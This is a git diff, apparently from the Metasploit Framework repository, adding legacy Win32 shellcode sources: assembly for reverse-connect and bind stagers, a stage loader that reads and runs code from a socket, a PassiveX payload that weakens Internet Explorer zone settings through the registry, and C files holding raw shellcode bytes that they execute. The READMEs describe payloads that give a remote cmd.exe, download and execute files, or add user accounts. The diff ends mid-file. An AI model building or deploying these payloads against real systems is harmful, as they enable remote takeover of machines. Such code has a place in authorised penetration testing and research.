diff --git a/external/source/shellcode/windows/README b/external/source/shellcode/windows/README new file mode 100644 index 0000000000..c5e14b3a67 --- /dev/null +++ b/external/source/shellcode/windows/README @@ -0,0 +1,18 @@ +This directory contains the win32 payload development environment used +for creating the payloads in version 3 of the Metasploit Framework. + +The 'nasm' executable must be in your path to use the included build tool. + +The included 'build' script automatically creates a number of file types +each time it used to compile a payload. These file types are: + + - Native ELF executable + - Win32 PE executable + - Generated C source code + - Raw opcodes in ".bin" format + +The PE executable templates were developed by 'rix' and used with permission. + +To use this script, simply run ./build , where the name +does not include the ".asm" suffix. To build win32_stage_api.asm, the +command line would be "./build win32_stage_api". diff --git a/external/source/shellcode/windows/msf2/README b/external/source/shellcode/windows/msf2/README new file mode 100755 index 0000000000..904de7d4fd --- /dev/null +++ b/external/source/shellcode/windows/msf2/README @@ -0,0 +1,53 @@ +This directory contains the win32 payload development environment used +for creating the payloads in version 2.2 of the Metasploit Framework. + +The 'nasm' executable must be in your path to use the included build tool. + +The included 'build' script automatically creates a number of file types +each time it used to compile a payload. These file types are: + + - Native ELF executable + - Win32 PE executable + - Generated C source code + - Raw opcodes in ".bin" format + +The PE executable templates were developed by 'rix' and used with permission. + +To use this script, simply run ./build , where the name +does not include the ".asm" suffix. To build win32_stage_api.asm, the +command line would be "./build win32_stage_api". + +The Win32 payloads are somewhat modular, each component includes other +components to create the final payload. The dependency tree for the +reverse connect shell is: + +win32_stage_api.asm + win32_stage_boot_winsock_conn.asm + win32_stage_boot_reverse.asm + win32_stage_shell.asm + + +This allows the different components to be maintained invidually, shared +among multiple payloads, and converted into multi-stage payloads almost +instantly. This release includes the following last-stage payloads: + +win32_stage_shell.asm + Executes cmd.exe with in/out redirected to socket, this is used by + the reverse connect and bind stagers. + +win32_stage_winexec.asm + This payload simply executes an arbitrary command line, it can be used to + accomplish things such as ftp/download/execute sequences, adding a user + accounts, or just signaling that the exploit was successful. + +win32_stage_inlineegg.asm + Writes GetProcAddress/LoadLibaryA address to socket, then reads and execs + the rest of the payload from the socket. This allows us to send InlineEgg + generated payloads as a last stage. + +win32_stage_uploadexec.asm + Reads a file size from socket, then opens up a hidden/system local file + (c:\metasploit.exe) and downloads the executable from the socket into this + file. Once the download is complete, it then executes this file with in/out + redirected to the socket. This can be extremely useful when combined with + a self-extracting/executing rootkit or language intepreter (perl.exe). diff --git a/external/source/shellcode/windows/msf2/passivex.asm b/external/source/shellcode/windows/msf2/passivex.asm new file mode 100644 index 0000000000..99103632dc --- /dev/null +++ b/external/source/shellcode/windows/msf2/passivex.asm @@ -0,0 +1,176 @@ +BITS 32 +GLOBAL _start + +_start: + cld + call get_find_function +strings: + db "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", 0x0 +reg_values: + db "1004120012011001" +url: + db "C:\progra~1\intern~1\iexplore -new", 0x0 + +get_find_function: + call startup +find_function: + pushad + mov ebp, [esp + 0x24] + mov eax, [ebp + 0x3c] + mov edi, [ebp + eax + 0x78] + add edi, ebp + mov ecx, [edi + 0x18] + mov ebx, [edi + 0x20] + add ebx, ebp +find_function_loop: + jecxz find_function_finished + dec ecx + mov esi, [ebx + ecx * 4] + add esi, ebp + compute_hash: + xor eax, eax + cdq +compute_hash_again: + lodsb + test al, al + jz compute_hash_finished + ror edx, 0xd + add edx, eax + jmp compute_hash_again +compute_hash_finished: +find_function_compare: + cmp edx, [esp + 0x28] + jnz find_function_loop + mov ebx, [edi + 0x24] + add ebx, ebp + mov cx, [ebx + 2 * ecx] + mov ebx, [edi + 0x1c] + add ebx, ebp + mov eax, [ebx + 4 * ecx] + add eax, ebp + mov [esp + 0x1c], eax +find_function_finished: + popad + retn 8 + +startup: + pop edi + pop ebx +find_kernel32: + xor edx, edx + mov eax, [fs:edx+0x30] + test eax, eax + js find_kernel32_9x +find_kernel32_nt: + mov eax, [eax + 0x0c] + mov esi, [eax + 0x1c] + lodsd + mov eax, [eax + 0x8] + jmp short find_kernel32_finished +find_kernel32_9x: + mov eax, [eax + 0x34] + add eax, byte 0x7c + mov eax, [eax + 0x3c] +find_kernel32_finished: + + mov ebp, esp +find_kernel32_symbols: + push 0x73e2d87e ; ExitProcess + push eax + push 0x16b3fe72 ; CreateProcessA + push eax + push 0xec0e4e8e ; LoadLibraryA + push eax + call edi + xchg eax, esi + call edi + mov [ebp], eax + call edi + mov [ebp + 0x4], eax + +load_advapi32: + push edx + push 0x32336970 + push 0x61766461 + push esp + call esi + +resolve_advapi32_symbols: + push 0x02922ba9 + push eax + push 0x2d1c9add + push eax + call edi + mov [ebp + 0x8], eax + call edi + xchg eax, edi + + xchg esi, ebx +open_key: + push esp + push esi + push 0x80000001 + call edi + pop ebx + add esi, byte (reg_values - strings) + + push eax + mov edi, esp +set_values: + cmp byte [esi], 'C' + jz initialize_structs + push eax + lodsd + push eax + mov eax, esp + push byte 0x4 + push edi + push byte 0x4 + push byte 0x0 + push eax + push ebx + call [ebp + 0x8] + jmp set_values + +; This is NT specific, but it lets us execute iexplore regardless +; of what drive it's installed on so long as it's on the same drive +; as the WINDOWS directory, which it should always be. +fixup_drive_letter: + mov cl, byte [0x7ffe0030] + mov byte [esi], cl + +initialize_structs: + push byte 0x54 + pop ecx + sub esp, ecx + mov edi, esp + push edi + rep stosb + pop edi + mov byte [edi], 0x44 + inc byte [edi + 0x2c] + inc byte [edi + 0x2d] + +; set lpDesktop to WinSta0\Default so that this works with non-interactive services + push 0x00746c75 + push 0x61666544 + push 0x5c306174 + push 0x536e6957 + mov [edi + 8], esp + +execute_process: + lea ebx, [edi + 0x44] + push ebx + push edi + push eax + push eax + push byte 0x10 + push eax + push eax + push eax + push esi + push eax + call [ebp] + +exit_process: + call [ebp + 0x4] diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.bin b/external/source/shellcode/windows/msf2/win32_reverse_read.bin new file mode 100644 index 0000000000..00f1106b13 Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read.bin differ diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.c b/external/source/shellcode/windows/msf2/win32_reverse_read.c new file mode 100644 index 0000000000..95aeb8b65d --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_reverse_read.c @@ -0,0 +1,28 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60" +"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b" +"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59" +"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27" +"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50" +"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89" +"\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56" +"\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57" +"\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.elf b/external/source/shellcode/windows/msf2/win32_reverse_read.elf new file mode 100755 index 0000000000..1c3db3899c Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read.elf differ diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.exe b/external/source/shellcode/windows/msf2/win32_reverse_read.exe new file mode 100644 index 0000000000..31ef1697f1 Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read.exe differ diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin new file mode 100644 index 0000000000..d47ff25908 Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin differ diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c new file mode 100644 index 0000000000..991bb54e0d --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c @@ -0,0 +1,29 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60" +"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b" +"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59" +"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27" +"\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06" +"\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00" +"\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x1b" +"\x63\xff\xfe\x98\xbf\x36\x06\x00\x00\x00\x59\x6a\x1c\x51\x57\xff" +"\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00" +"\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf new file mode 100755 index 0000000000..fd4f36196b Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf differ diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe new file mode 100644 index 0000000000..a55ffc721a Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe differ diff --git a/external/source/shellcode/windows/msf2/win32_stage_api.asm b/external/source/shellcode/windows/msf2/win32_stage_api.asm new file mode 100644 index 0000000000..bea70bfe12 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_api.asm @@ -0,0 +1,86 @@ +; Title: Win32 API Loader +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + +[BITS 32] + +global _start +_start: + + call LKernel32Base + +LGetProcAddress: + push ebx + push ebp + push esi + push edi + mov ebp, [esp + 24] + mov eax, [ebp + 0x3c] + mov edx, [ebp + eax + 120] + add edx, ebp + mov ecx, [edx + 24] + mov ebx, [edx + 32] + add ebx, ebp + +LFnlp: + jecxz LNtfnd + dec ecx + mov esi, [ebx + ecx * 4] + add esi, ebp + xor edi, edi + cld + +LHshlp: + xor eax, eax + lodsb + cmp al, ah + je LFnd + ror edi, 13 + add edi, eax + jmp short LHshlp + +LFnd: + cmp edi, [esp + 20] + jnz LFnlp + mov ebx, [edx + 36] + add ebx, ebp + mov cx, [ebx + 2 * ecx] + mov ebx, [edx + 28] + add ebx, ebp + mov eax, [ebx + 4 * ecx] + add eax, ebp + jmp short LDone + +LNtfnd: + xor eax, eax + +LDone: + pop edi + pop esi + pop ebp + pop ebx + ret 8 + +LKernel32Base: + pop esi + push byte 0x30 + pop ecx + mov ebx, [fs:ecx] + mov ebx, [ebx + 0x0c] + mov ebx, [ebx + 0x1c] + mov ebx, [ebx] + mov ebx, [ebx + 0x08] + + push ebx ; kernel32.dll base + push 0xec0e4e8e ; LoadLibraryA + call esi ; GetProcAddress(kerne32.dll, LoadLibrary) + mov edi, eax + + push ebx ; kernel32.dll base + push 0x91afca54 ; VirtualAlloc + call esi ; GetProcAddress(kerne32.dll, VirtualAlloc) + + ; ebx = kernel32.dll base + ; esi = LGetProcAddress + ; edi = LoadLibraryA + ; eax = VirtualAlloc diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm new file mode 100644 index 0000000000..8addaeaa78 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm @@ -0,0 +1,33 @@ +; Title: Win32 Reverse Connect Payload +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_winsock_bind.asm" + + +LBind: + xor ebx, ebx + push ebx + push ebx + push dword 0x11220002 ; port 8721 + mov eax, esp + push byte 0x10 ; length + push eax + push edi + call FN_BIND + +LListen: + push ebx + push edi + call FN_LISTEN + +LAccept: + push ebx + push esp + push edi + call FN_ACCEPT + mov edi, eax diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm new file mode 100644 index 0000000000..7ae75c6f6d --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm @@ -0,0 +1,10 @@ +; Title: Win32 Reverse Connect Read Payload +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_bind.asm" +%include "win32_stage_inlineegg.asm" diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm new file mode 100644 index 0000000000..8722a7c654 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm @@ -0,0 +1,34 @@ +; Title: Win32 Reverse Connect Read Payload +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_bind.asm" + +LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) + + push byte 0x40 + pop esi + push esi ; PAGE_EXECUTE_READWRITE=0x40 + + shl esi, 6 ; MEM_COMMIT=0x1000 + push esi + + shl esi, 8 ; 1MB + push esi + + push byte 0x00 ; NULL + call [ebp+12] + mov ebx, eax + + +LRecvLength: ; recv(s, buff, 4, 0) + push byte 0x00 ; flags + push 4096 ; length + push ebx ; buffer + push dword edi ; socket + call FN_RECV ; recv() + call ebx diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin new file mode 100644 index 0000000000..cab4531bce Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin differ diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c new file mode 100644 index 0000000000..b288941939 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c @@ -0,0 +1,29 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49" +"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" +"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" +"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" +"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" +"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" +"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" +"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56" +"\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a" +"\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf new file mode 100755 index 0000000000..57f04909f3 Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf differ diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe new file mode 100644 index 0000000000..e613af04e3 Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe differ diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm new file mode 100644 index 0000000000..10ae1238b8 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm @@ -0,0 +1,10 @@ +; Title: Win32 Network Shell +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_bind.asm" +%include "win32_stage_shell.asm" diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm new file mode 100644 index 0000000000..3042142976 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm @@ -0,0 +1,37 @@ +; Title: Win32 Reverse Connect Payload +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_winsock_conn.asm" + +; [ebp + 0] = kernel32.dll base +; [ebp + 4] = LGetProcAddress +; [ebp + 8] = LoadLibraryA +; [ebp + 12] = VirtualAlloc +; [ebp + 24] = recv +; [ebp + 28] = send +; [ebp + 32] = accept +; [ebp + 36] = bind +; [ebp + 40] = connect +; [ebp + 44] = WSASocketA +; [ebp + 48] = WSAStartup +; [ebp + 52] = Payload Length + +LConnect: + push 0x0100007f; host: 127.0.0.1 + push 0x11220002 ; port: 8721 + mov ecx, esp + push byte 0x10 + push ecx + push dword edi + call dword FN_CONNECT + pop ecx ; remove port + pop ecx ; remove host + + ; reconnect on failure + ; test eax, eax + ; jne short LConnect diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm new file mode 100644 index 0000000000..847a79b70e --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm @@ -0,0 +1,10 @@ +; Title: Win32 Reverse Connect Read Payload +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_reverse.asm" +%include "win32_stage_inlineegg.asm" diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm new file mode 100644 index 0000000000..3c303d8419 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm @@ -0,0 +1,26 @@ +; Title: Win32 Reverse Connect Read Payload +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_reverse.asm" + + +LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) + push byte 0x40 ; PAGE_EXECUTE_READWRITE + push dword 0x1000 ; MEM_COMMIT + push dword 0x100000 ; 1Mb + push byte 0x00 ; NULL + call [ebp+12] + mov ebx, eax + +LRecvLength: ; recv(s, buff, 4, 0) + push byte 0x00 ; flags + push 4096 ; length + push ebx ; buffer + push dword edi ; socket + call FN_RECV ; recv() + call ebx diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin new file mode 100644 index 0000000000..51f795b33c Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin differ diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c new file mode 100644 index 0000000000..730ce91b4d --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c @@ -0,0 +1,28 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60" +"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b" +"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59" +"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27" +"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50" +"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89" +"\xe1\x6a\x10\x51\x57\xff\x55\x20\x59\x59\x6a\x40\x68\x00\x10\x00" +"\x00\x68\x00\x00\x10\x00\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68" +"\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf new file mode 100755 index 0000000000..ed4b42c5ae Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf differ diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe new file mode 100644 index 0000000000..1b5d0fff81 Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe differ diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm new file mode 100644 index 0000000000..6c431cfa97 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm @@ -0,0 +1,10 @@ +; Title: Win32 Network Shell +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_reverse.asm" +%include "win32_stage_shell.asm" diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm new file mode 100644 index 0000000000..54547cc9b4 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm @@ -0,0 +1,11 @@ +; Title: Win32 Network Shell +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_reverse.asm" +%include "win32_stage_revert.asm" +%include "win32_stage_shell.asm" diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm new file mode 100644 index 0000000000..b71b549caf --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm @@ -0,0 +1,39 @@ +; Title: Win32 Reverse UDP "Connect" Payload +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_winsock_conn_udp.asm" + +; [ebp + 0] = kernel32.dll base +; [ebp + 4] = LGetProcAddress +; [ebp + 8] = LoadLibraryA +; [ebp + 12] = VirualAlloc +; [ebp + 24] = recv +; [ebp + 28] = send +; [ebp + 32] = accept +; [ebp + 36] = bind +; [ebp + 40] = connect +; [ebp + 44] = WSASocketA +; [ebp + 48] = WSAStartup +; [ebp + 52] = Payload Length + +LConnect: + ;push 0xf401a8c0 ; 192.168.1.244 + ;push 0xbc32a8c0 ; 192.168.50.187 + push 0x0100007f; host: 127.0.0.1 + push 0x11220002 ; port: 8721 + mov ecx, esp + push byte 0x10 + push ecx + push dword edi + call dword FN_CONNECT + pop ecx ; remove port + pop ecx ; remove host + + ; reconnect on failure + ; test eax, eax + ; jne short LConnect diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm new file mode 100644 index 0000000000..b13c5d5744 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm @@ -0,0 +1,77 @@ +; Title: Win32 Socket Initialization +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + +[BITS 32] + +%include "win32_stage_api.asm" + +sub esp, 0x100 +push eax ; [ebp + 12] = VirtualAlloc +push edi ; [ebp + 8] = LoadLibraryA +push esi ; [ebp + 4] = LGetProcAddress +push ebx ; [ebp + 0] = kernel32.dll base + +mov ebp, esp +call LLoadWinsock + +%define 